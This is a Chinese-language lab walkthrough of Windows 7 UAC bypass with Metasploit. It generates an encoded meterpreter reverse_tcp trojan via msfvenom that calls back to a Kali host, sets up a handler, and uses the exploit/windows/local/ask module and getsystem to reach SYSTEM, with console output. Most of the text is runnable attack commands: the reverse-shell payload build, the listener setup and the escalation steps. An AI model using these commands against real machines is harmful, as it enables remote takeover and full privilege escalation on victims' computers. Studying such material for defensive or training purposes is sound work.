前期准备
目标机 | 攻击机 |
---|---|
win7 | kali |
192.168.43.254 | 192.168.43.113 |
我这里,只演示攻击过程,如果有不懂的命令可以去看看我其他的文章有专门我做命令的笔记或者自行去百度。
UAC简介
UAC(User Account Control,用户帐户控制)是微软为提高系统安全而在Windows Vista中引入的新技术,它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限或管理员密码。
也就是说一旦用户允许启动的应用程序通过UAC验证,那么这个程序也就有了管理员权限。如果我们通过某种方式劫持了通过用户UAC验证的程序,那么相应的我们的程序也就实现了提权的过程。
前期演示
由于是演示,那么这里我们直接msf生成一个木马来拿到一个shell
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.43.113 LPORT=6666 -b "\x00" -e x86/shikata_ga_nai -f exe > uac.exe
设置监听
use exploit/multi/handler
设置payload
set payload windows/meterpreter/reverse_tcp
设置监听的IP和端口
set lhost 192.168.43.113
set lport 6666
然后run,打开win7的机器点击uac.exe打开kali已经拿到了shell
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.43.113:6666
[*] Sending stage (179779 bytes) to 192.168.43.254
[*] Meterpreter session 1 opened (192.168.43.113:6666 -> 192.168.43.254:50063) at 2020-10-05 22:02:08 +0800
meterpreter >
可以看到是个管理员权限
meterpreter > getuid
Server username: LS--20200725FKO\Administrator
然后我们getsystem提权失败把它放到后台
meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > se
search services sessions set setg
msf5 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x86/windows LS--20200725FKO\Administrator @ LS--20200725FKO 192.168.43.113:6666 -> 192.168.43.254:50080 (192.168.43.254)
UAC提权
放到后台之后,使用下面这个模块
use exploit/windows/local/ask
查看一下模块信息,然后设置我们要设置的
msf5 exploit(windows/local/ask) > info
Name: Windows Escalate UAC Execute RunAs
Module: exploit/windows/local/ask
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2012-01-03
Provided by:
mubix <mubix@hak5.org>
b00stfr3ak
Available targets:
Id Name
-- ----
0 Windows
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no File name on disk
PATH no Location on disk, %TEMP% used if not set
SESSION yes The session to run this module on.
TECHNIQUE EXE yes Technique to use (Accepted: PSH, EXE)
Payload information:
Description:
This module will attempt to elevate execution level using the
ShellExecute undocumented RunAs flag to bypass low UAC settings.
通过上面,我们知道要设置一下session
msf5 exploit(windows/local/ask) > set session 2
session => 2
另外两个不是必须的,可设置也可不设置,然后run
msf5 exploit(windows/local/ask) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
5 meterpreter x86/windows LS--20200725FKO\Administrator @ LS--20200725FKO 192.168.43.113:6666 -> 192.168.43.254:49187 (192.168.43.254)
6 meterpreter x86/windows LS--20200725FKO\Administrator @ LS--20200725FKO 192.168.43.113:6666 -> 192.168.43.254:49187 (192.168.43.254)
可以看到有两个session但是都是管理员权限
msf5 exploit(windows/local/ask) > sessions -i 6
[*] Starting interaction with 6...
meterpreter >
我们进到6里面
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
拿到system权限
模块名称 | 我的理解 |
---|---|
exploit/windows/local/ask | 需要点击 |
exploit/windows/local/bypassuac | 不需要点击 |
Exploit/windows/local/ms14_058_track_popup_menu |